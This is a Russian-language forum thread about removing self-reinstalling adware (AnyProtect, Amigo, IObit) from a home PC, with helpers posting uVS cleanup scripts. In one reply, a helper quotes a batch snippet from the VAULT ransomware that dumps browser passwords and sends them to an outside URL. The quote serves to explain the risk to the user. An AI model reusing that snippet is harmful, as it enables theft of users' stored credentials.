Вступила в... Комету, амиго, иобит шредер, энипротект и еще пару радостей

Счастье · 29.06.2015, 20:26

Доброго времени суток.
Недавно искала умную книжку, и пока скачивала ее, искала другую, отвлеклась (один раз) и случайно согласилась с распаковкой винрар-архива с расширением exe
И понеслаааась душа в рай, пока я делала кофе, эти подонки наустанавливали мне радостных приложений, панелек и прочей нечисти.
От иобит шредера избавилась, комету и амиго испепелила, а вот энипротект (то бишь AnyProtect) настырно живет своей жизнью. То есть удаляю его, а он около 23:00 каждый вечер уже четвертый раз все равно сам устанавливается.
Вроде и реестр позавчера чистила....
Как его прикончить, помогите советом! Заранее спасибо преогромное!)))

Ultras · 29.06.2015, 21:22

Цитата:

Сообщение от Счастье

он около 23:00 каждый вечер уже четвертый раз все равно сам устанавливается.

В планировщик не заглядывали?

maxskdi · 29.06.2015, 21:46

В гугле полно инфы на эту тему. Думаю счастье решило этот вопрос.

Николай_С · 29.06.2015, 23:24

AnyProtect?
Это тот который весь на иероглифах?
Даже и не пытался его дезинсталлировать - мочил сразу процесс в памяти, затем HiJackThis-ом чистил автозапуск, потом реестр. Напоследок удалил сами файлы и папку.
Снес с первого раза.

safety · 30.06.2015, 06:30

правильнее будет все таки создать образ автозапуска системы из нормального или безопасного режима и рассмотреть все вредоносные запчасти, которые остались после вирусной атаки.

актуальную версию uVS можно скачать отсюда
https://content.wuala.com/contents/a...test.zip/?dl=1
как создать образ автозапуска
Как создать образ автозапуска в uVS. Краткая инструкция

Счастье · 01.07.2015, 02:45

Нет, я его таки добила позавчера, но все почищу конечно, просто времени не было)))
Спасибо огромное за советы и ссылки!
Вот эти самоустанавливающиеся гадостные программы чисто гипотетически способны уводить пароли от сбербанка онлайн например? А то где-то прочитала и уже неделю боюсь им пользоваться...

safety · 01.07.2015, 10:44

если не сохраняете пароли в парольном менеджере браузера, или хотя бы ставите надежный пароль на доступ к сохраненным в браузере паролям, тогда вряд ли получится увести пароли. Если хранители паролей в браузерах без установленного мастер-пароля, то уведут запросто.

вот пример такой программы:
Browser Password Dump : Free Command-line Tool to Recover Login Password from Web Browsers

Цитата:

Сurrently it can recover stored web login passwords from following browsers.

Firefox
Internet Explorer
Google Chrome
Chrome Canary/SXS
CoolNovo Browser
Opera Browser
Apple Safari
Flock Browser
SeaMonkey Browser
SRWare Iron Browser
Comodo Dragon Browser

после установки запускается из командной строки:

Цитата:

BrowserPasswordDump.exe -f "c:\passlist.txt"

именно эта утилита используется злоумышленниками в энкодере ВАУЛТ, т.е. там помимо шифрования документов еще и уводятся пароли из браузеров.

Цитата:

if exist 065ed39e.exe (
"%temp%\065ed39e.exe" -f "%temp%\6eb7832c.a238703f"
wscript.exe //B //Nologo //T:120 "%temp%\3c2901e8.vbs" "%temp%\6eb7832c.a238703f" http://attached-email.com/v.php pf
del /f /q 065ed39e.exe

Счастье · 06.07.2015, 18:21

Цитата:

Сообщение от ~safety

правильнее будет все таки создать образ автозапуска системы из нормального или безопасного режима и рассмотреть все вредоносные запчасти, которые остались после вирусной атаки.

актуальную версию uVS можно скачать отсюда
https://content.wuala.com/contents/a...test.zip/?dl=1
как создать образ автозапуска
Как создать образ автозапуска в uVS. Краткая инструкция

Что-то не выходит у меня их победить, что-то не так работает, вот мой архив
труба там, да? =(
BIG-BANG_2015-07-06_21-53-19.7z

safety · 07.07.2015, 07:36

почти победили,
остались только левые стартовые, все остальное неактивно.

выполняем скрипт в uVS
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

Код:

;uVS v3.85.25 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v385c
OFFSGNSAVE
zoo %SystemDrive%\PROGRAM FILES (X86)\ANYPROTECTEX\ANYPROTECT.EXE
addsgn 1A74EF9A5583C58CF42B95BC14B97A0550880F3560E586788548043F30D2718B238FA6343E93DD412B430FDE4293898F7867481736DA73A7D2222FC3447B2A73 8 anyprotect

zoo %SystemDrive%\USERS\НАТАЛЬЯ\APPDATA\LOCAL\0000D88D-1435354935-3118-FFFF-BCEE7B4A2AEE\PNSVABEA.EXE
addsgn 7300F79B556A1F275DE775E6ED94361DE2CED8E6E96B5F78B63503F874C251B33627B3173E3D9CC92B807B8AF66609FA2E20FD0E279AB04625D4BCC38506CA82 59 Win32/Adware.ConvertAd.AQ [ESET-NOD32]

zoo %SystemDrive%\USERS\НАТАЛЬЯ\APPDATA\ROAMING\VOPACKAGE\VOPACKAGE.EXE
hide %SystemDrive%\PROGRAM FILES (X86)\CYBERLINK\POWERDVD10\AUDIOFILTER\CLAUD.AX
;------------------------autoscript---------------------------

chklst
delvir

delref HTTP://WWW.MYSTARTSEARCH.COM/?TYPE=HP&TS=1435764415&Z=5699905061E89471DA5FEF8G1Z2C6W7M7Q9Z3Z8E4T&FROM=CMI&UID=TOSHIBAXMQ01ABD075_93OZTBIJTXX93OZTBIJT

delref HTTP://WWW.MYSTARTSEARCH.COM/WEB/?TYPE=DS&TS=1435764415&Z=5699905061E89471DA5FEF8G1Z2C6W7M7Q9Z3Z8E4T&FROM=CMI&UID=TOSHIBAXMQ01ABD075_93OZTBIJTXX93OZTBIJT&Q={SEARCHTERMS}

delref HTTP://WWW.ISTARTSURF.COM/WEB/?TYPE=DSPP&TS=1435325953&Z=7AFE2104537C4A702864946GAZ5CEW3CAO7WAT6Z2T&FROM=KEY1&UID=TOSHIBAXMQ01ABD075_93OZTBIJTXX93OZTBIJT&Q={SEARCHTERMS}

; Remote Desktop Access (VuuPC)
exec  C:\Users\Наталья\AppData\Roaming\VOPackage\Uninstall.exe
deldir %SystemDrive%\USERS\НАТАЛЬЯ\APPDATA\ROAMING\ISTARTSURF
deldir %SystemDrive%\USERS\НАТАЛЬЯ\APPDATA\ROAMING\VOPACKAGE
deldir %SystemDrive%\PROGRAM FILES (X86)\ANYPROTECTEX

deltmp
delnfr
;-------------------------------------------------------------

restart

перезагрузка,
----------
+
далее,
можно сделать проверку в малваребайт
выполните сканирование (угроз) в Malwarebytes

Счастье · 09.07.2015, 22:14

Вот что пишет, ошибка какая-то...

29.06.2015, 20:26	#1 (permalink)
Счастье Не очень хороший человек Регистрация: 01.12.2012 Сообщений: 6,155 Записей в дневнике: 18 Сказал(а) спасибо: 1,305 Поблагодарили 755 раз(а) в 231 сообщениях Репутация: 98885	Вступила в... Комету, амиго, иобит шредер, энипротект и еще пару радостей Доброго времени суток. Недавно искала умную книжку, и пока скачивала ее, искала другую, отвлеклась (один раз) и случайно согласилась с распаковкой винрар-архива с расширением exe И понеслаааась душа в рай, пока я делала кофе, эти подонки наустанавливали мне радостных приложений, панелек и прочей нечисти. От иобит шредера избавилась, комету и амиго испепелила, а вот энипротект (то бишь AnyProtect) настырно живет своей жизнью. То есть удаляю его, а он около 23:00 каждый вечер уже четвертый раз все равно сам устанавливается. Вроде и реестр позавчера чистила.... Как его прикончить, помогите советом! Заранее спасибо преогромное!))) __________________ Все будет хорошо.

01.07.2015, 02:45	#6 (permalink)
Счастье Не очень хороший человек Регистрация: 01.12.2012 Сообщений: 6,155 Записей в дневнике: 18 Сказал(а) спасибо: 1,305 Поблагодарили 755 раз(а) в 231 сообщениях Репутация: 98885	Нет, я его таки добила позавчера, но все почищу конечно, просто времени не было))) Спасибо огромное за советы и ссылки! Вот эти самоустанавливающиеся гадостные программы чисто гипотетически способны уводить пароли от сбербанка онлайн например? А то где-то прочитала и уже неделю боюсь им пользоваться... __________________ Все будет хорошо.

09.07.2015, 22:14	#10 (permalink)
Счастье Не очень хороший человек Регистрация: 01.12.2012 Сообщений: 6,155 Записей в дневнике: 18 Сказал(а) спасибо: 1,305 Поблагодарили 755 раз(а) в 231 сообщениях Репутация: 98885	Вот что пишет, ошибка какая-то... __________________ Все будет хорошо.

29.06.2015, 20:26
Helpmaster Member Регистрация: 08.03.2016 Сообщений: 0	С вашей темой имеются схожие темы, можете пролистать Продам пару трансформаторов ТП-80-1 Пару вопросов о многоядерности Продам пару динамиков Пару вопросов начинающего Пару неоновых ламп и вот что получилось!

29.06.2015, 21:46	#3 (permalink)
maxskdi Member Регистрация: 12.07.2012 Сообщений: 129 Сказал(а) спасибо: 0 Поблагодарили 0 раз(а) в 0 сообщениях Репутация: 964	В гугле полно инфы на эту тему. Думаю счастье решило этот вопрос.

29.06.2015, 23:24	#4 (permalink)
Николай_С Радиоинженер Регистрация: 25.09.2012 Адрес: г.Дзержинск Нижегородской обл. Сообщений: 25,308 Записей в дневнике: 7 Сказал(а) спасибо: 292 Поблагодарили 219 раз(а) в 70 сообщениях Репутация: 110185	AnyProtect? Это тот который весь на иероглифах? Даже и не пытался его дезинсталлировать - мочил сразу процесс в памяти, затем HiJackThis-ом чистил автозапуск, потом реестр. Напоследок удалил сами файлы и папку. Снес с первого раза.

30.06.2015, 06:30	#5 (permalink)
safety Member Регистрация: 12.07.2011 Сообщений: 31,192 Записей в дневнике: 6 Сказал(а) спасибо: 1 Поблагодарили 21 раз(а) в 7 сообщениях Репутация: 15348	правильнее будет все таки создать образ автозапуска системы из нормального или безопасного режима и рассмотреть все вредоносные запчасти, которые остались после вирусной атаки. актуальную версию uVS можно скачать отсюда https://content.wuala.com/contents/a...test.zip/?dl=1 как создать образ автозапуска Как создать образ автозапуска в uVS. Краткая инструкция

Ads
Яндекс Member Регистрация: 31.10.2006 Сообщений: 40200 Записей в дневнике: 0 Сказал(а) спасибо: 0 Поблагодарили 0 раз(а) в 0 сообщениях Репутация: 55070